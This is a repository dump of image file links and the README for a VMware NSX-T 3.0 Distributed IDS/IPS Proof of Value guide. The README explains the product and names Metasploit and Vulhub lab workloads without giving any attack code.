https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_1.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_10.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_10.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_11.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_11.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_12.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_12.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_13.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_13.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_14.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_14.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_15.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_15.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_16.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_16.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_17.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_17.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_18.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_18.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_19.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_19.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_2.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_2.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_20.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_20.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_21.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_21.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_22.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_22.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_23.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_23.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_24.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_24.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_25.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_25.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_26.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_26.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_27.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_27.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_27_SMALL.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_27_SMALL.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_28.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_28.gif
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_29.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_29.gif
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_3.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_3.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_30.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_30.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_31.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_31.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_32.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_32.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_33.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_33.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_34.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_34.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_35.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_35.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_36.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_36.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_37.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_37.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_38.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_38.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_39.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_39.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_4.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_4.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_40.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_40.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_41.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_41.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_42.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_42.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_43.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_43.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_44.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_44.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_45.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_45.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_46.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_46.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_47.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_47.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_48.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_48.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_49.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_49.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_5.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_5.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_50.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_50.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_51.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_51.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_52.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_52.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_53.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_53.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_54.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_54.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_55.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_55.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_56.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_56.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_57.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_57.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_58.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_58.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_59.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_59.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_6.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_6.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_60.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_60.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_61.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_61.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_62.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_62.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_7.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_7.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_8.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_8.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_9.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_9.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/NSX_Logo.jpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/NSX_Logo.jpeg
--------------------------------------------------------------------------------
/3.1/docs/assets/images/placeholder.tmp:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/Images/IDPS_POC_1.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/Images/IDPS_POC_1.PNG
--------------------------------------------------------------------------------
/Images/IDPS_POC_10.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/Images/IDPS_POC_10.PNG
--------------------------------------------------------------------------------
/Images/IDPS_POC_11.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/Images/IDPS_POC_11.PNG
--------------------------------------------------------------------------------
/Images/IDPS_POC_12.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/Images/IDPS_POC_12.PNG
--------------------------------------------------------------------------------
/Images/IDPS_POC_13.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/Images/IDPS_POC_13.PNG
--------------------------------------------------------------------------------
/Images/IDPS_POC_14.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/Images/IDPS_POC_14.PNG
--------------------------------------------------------------------------------
/Images/IDPS_POC_18.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/Images/IDPS_POC_18.PNG
--------------------------------------------------------------------------------
/Images/IDPS_POC_2.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/Images/IDPS_POC_2.PNG
--------------------------------------------------------------------------------
/Images/IDPS_POC_3.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/Images/IDPS_POC_3.PNG
--------------------------------------------------------------------------------
/Images/IDPS_POC_4.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/Images/IDPS_POC_4.PNG
--------------------------------------------------------------------------------
/Images/IDPS_POC_40.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/Images/IDPS_POC_40.PNG
--------------------------------------------------------------------------------
/Images/IDPS_POC_41.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/Images/IDPS_POC_41.PNG
--------------------------------------------------------------------------------
/Images/IDPS_POC_42.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/Images/IDPS_POC_42.PNG
--------------------------------------------------------------------------------
/Images/IDPS_POC_5.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/Images/IDPS_POC_5.PNG
--------------------------------------------------------------------------------
/Images/IDPS_POC_6.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/Images/IDPS_POC_6.PNG
--------------------------------------------------------------------------------
/Images/IDPS_POC_7.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/Images/IDPS_POC_7.PNG
--------------------------------------------------------------------------------
/Images/IDPS_POC_8.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/Images/IDPS_POC_8.PNG
--------------------------------------------------------------------------------
/Images/IDPS_POC_9.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/Images/IDPS_POC_9.PNG
--------------------------------------------------------------------------------
/Images/placeholder.tmp:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/Images/screenshot-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/Images/screenshot-1.png
--------------------------------------------------------------------------------
/Images/screenshot-2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/Images/screenshot-2.png
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | # NSX-T 3.0 - Distributed IDS/IPS Proof of Value Guide
6 |
7 |
8 |
9 |
10 |
11 | ---
12 | **NEW!** Click [here](/3.1/README.md) for the NSX-T 3.1 IDS/IPS Guide
13 |
14 | ---
15 | ## Overview
16 | The goal of this Proof of Value (PoV) is to allow customers to get hands-on experience with the [NSX Distributed IDS/IPS](https://www.vmware.com/products/nsx-distributed-ids-ips.html). Participants in the PoV are expected to complete the exercises outlined in this guide in order to become familiar with the key capabilities offered by the NSX Distributed IDS/IPS. While not the focus of this PoV guide, participants will also gain basic experience with the Distributed Firewall and other NSX capabilities during the PoV process.
17 |
18 | While this PoV guide is quite prescriptive, participants can choose to modify any part of the workflow as desired. The guide is primarily focused on getting customers familiar with IDS/IPS, hence **the deployment of the lab environment and the rest of the configuration is automated through the use of a provided PowerShell script**. After meeting the prerequisites and running the script, a fully configured nested NSX-T environment is available to participants, including a number of attacker and victim workloads which are used as part of the IDS/IPS exercises. Once the nested lab has been deployed, the lab guide walks users through a number of attack scenarios, using tools like **Metasploit** to showcase the value of the NSX Distributed IDS/IPS.
19 |
20 | ## Introducing the VMware Service-defined Firewall
21 |
22 | 
23 |
24 | The VMware Service-defined Firewall is VMware’s solution to secure east-west traffic across multi-cloud environments and is made up of three main components. First of all, we have our distributed firewall, which enables micro-segmentation. The distributed firewall is in essence an in-kernel firewall that sits at the vNIC of every workload in the environment, enabling any level of filtering: micro-segmentation between the tiers of an application, macro-segmentation (for example, isolating production from development workloads), or anything in between, completely independent of the underlying networking. Over the last few years, we’ve evolved the distributed firewall into a full Layer 7 stateful firewall.
25 |
26 | NSX Intelligence is our distributed visibility and analytics platform, fully integrated into NSX. It provides visibility of all flows without having to rely on traditional mechanisms such as NetFlow or copying all traffic, and also provides policy formulation, which enables customers to get to full micro-segmentation much quicker. And with NSX-T 3.0 we’ve added the Distributed IDS/IPS, which is based on the same distributed architecture, now for the first time enabling customers to have a network-based IDS/IPS that sits at the vNIC of every workload, with the ability to intercept every flow, without having to hairpin any traffic, regardless of network connectivity.
27 |
28 | ## Introducing the NSX Distributed IDS/IPS
29 |
30 | One of the key challenges with traditional network-based IDS/IPS solutions is that they rely on a massive amount of traffic being hairpinned or copied across to a centralized IPS appliance. This often requires re-architecting the network, and it also means that growing organizations have to continuously keep adding firewalls or IDS appliances to their centralized cluster to keep up with the growing amount of traffic that needs inspection.
31 | Another challenge with these solutions is that they don't offer protection against lateral movement of attacks within a particular network segment. If we have two application workloads deployed in the same VLAN, there isn’t any feasible way to insert an inline IPS appliance in between these workloads and repeat that for all the workloads in your entire datacenter.
32 | Furthermore, in virtualized datacenters, by leveraging DRS and vMotion, workloads often move to other hosts, clusters or datacenters. This means that traffic now gets redirected to another IPS appliance which has no context of the existing flows and may even have a different policy applied.
33 | Finally, centralized, network-based IDS/IPSes have very little understanding of the context of a flow. They just look at network traffic without knowing much about where the flow originated and whether or not the target of an attack is potentially vulnerable. As a result, all traffic needs to be matched against several thousand signatures. Signatures that detect an exploit against a vulnerability in Apache are also applied to a server that runs MySQL, and so on. This results in two key challenges. One is a high number of false positives, which makes it difficult for a security operator to distinguish important events that require immediate action from all the other ones, especially if the events don’t include context about who the victim is and what’s running on that victim machine. A second challenge with having to run all traffic through all signatures is that it significantly reduces throughput.
34 |
35 | The NSX Distributed IDS/IPS combines some of the best qualities of host-based IPS solutions with the best qualities of network-based IPS solutions to provide a radically different solution which enables Intrusion Detection and Prevention at the granularity of a workload and the scale of the entire datacenter.
36 |
37 | Similar to the operational model of the distributed firewall, the NSX distributed IDS/IPS is deployed in the hypervisor when NSX-T is enabled on that hypervisor. It does not require the deployment of any additional appliances on that hypervisor, on the guest VM or anywhere in the network.
38 |
39 | Instead of hairpinning traffic to a centralized IDS appliance across the network, IDS is applied right at the source or destination of the flow, as it leaves or enters a workload. As is the case with our distributed firewall, this also means that there is no need to re-architect the network to apply IDS/IPS, and that we can inspect traffic between workloads regardless of whether these workloads are on the same VLAN or logical segment or on different VLANs. The Distributed Firewall and IDS/IPS are applied to the traffic even before it hits the distributed switch. Almost invariably, the actual objective of an attack is not the same as where the attacker initially gained access, which means that an attacker will try to move through the environment in order to steal the valuable data they are after. Hence being able to defend not just against the initial attack vector, but also against lateral movement, is critical. Micro-segmentation using the distributed firewall is key in reducing the attack surface and makes lateral movement a lot more difficult, and now, for the first time, it becomes operationally feasible to front-end each of your workloads with an Intrusion Detection and Prevention service to detect and block attempts at exploiting vulnerabilities wherever they may exist, regardless of whether the attacker is trying to gain initial access to the environment, or has already compromised a workload on the same VLAN and is now trying to move laterally to their target database on that same VLAN.
40 |
41 | Our largest and most successful customers heavily rely on context to micro-segment their environment. They leverage security groups based on tags and other constructs to create a policy that is tied directly to the application itself rather than to network constructs like IP addresses and ports. This same context is also a very important differentiator which solves two key challenges seen with traditional IDS and IPS solutions. First of all, because we are embedded in the hypervisor, we have access to a lot more context than we could learn by just sitting on the network. We know, for instance, the name of each workload, the application it’s part of, and so on. VMware Tools and the Guest Introspection framework can provide us with additional context, such as the version of the operating system that is running on each guest and even what process or user has generated a particular flow. If a database server is known to be vulnerable to a specific vulnerability that is being exploited right now, it obviously warrants immediate attention, while a network admin triggering an IPS signature by running a scan should be far less of an immediate concern.
42 |
43 | In addition to enabling the appropriate prioritization, the same context can also be used to reduce the number of false positives, and increase the number of zero-false-positive workloads, as we have a good idea whether or not a target is potentially vulnerable, therefore reducing the amount of alerts that are often overwhelming with a traditional network-based solution. Finally, leveraging context, we can enable only the signatures that are relevant to the workloads we are protecting. If the distributed IDS instance is applied to an Apache server, we can enable only the signatures that are relevant and not the vast majority of signatures that are irrelevant to this workload. This drastically reduces the performance impact seen with traditional IDS/IPS.
44 |
45 | ---
46 | ## Disclaimer and acknowledgements
47 | This lab provides and leverages common pen-test tools including Metasploit, as well as purposefully vulnerable workloads built using Vulhub (https://github.com/vulhub/vulhub). Please only use these tools for the intended purpose of completing the PoV, isolate the lab environment properly from any other environment, and discard it when the PoV has been completed.
48 |
